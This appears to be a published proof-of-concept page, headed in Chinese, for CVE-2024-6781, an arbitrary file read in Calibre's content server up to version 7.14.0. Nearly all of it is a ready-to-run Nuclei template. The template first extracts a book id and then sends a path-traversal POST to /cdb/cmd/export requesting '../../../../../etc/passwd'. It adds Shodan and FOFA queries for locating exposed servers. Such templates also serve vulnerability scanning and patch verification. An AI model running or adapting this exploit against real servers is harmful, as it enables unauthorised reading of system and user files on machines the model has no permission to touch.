漏洞描述
Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
CVE-2024-6781: Calibre <= 7.14.0 Arbitrary File Read
PoC代码[已公开]
id: CVE-2024-6781
info:
name: Calibre <= 7.14.0 Arbitrary File Read
author: DhiyaneshDK
severity: high
description: |
Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
reference:
- https://starlabs.sg/advisories/24/24-6781/
classification:
epss-score: 0.93406
epss-percentile: 0.99814
cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: calibre-ebook
product: calibre
shodan-query: html:"Calibre"
fofa-query: "Server: calibre"
max-request: 2
tags: cve,cve2024,calibre,lfi
http:
- raw:
- |
GET /interface-data/books-init HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: book_ids
internal: true
json:
- '.search_result.book_ids[0]'
- raw:
- |
POST /cdb/cmd/export HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""]
matchers-condition: and
matchers:
- type: word
part: content_type
words:
- "application/json"
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- '"result":'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402207456ae451ab5957181a36175d5f73c4bae8c4c762c0f5a75e7da821d6a98f16f02204a76a6b97dd55839b38a2ae77d91727c858de833a008e294b914c2749e832475:922c64590222798bb761d5b6d8e72950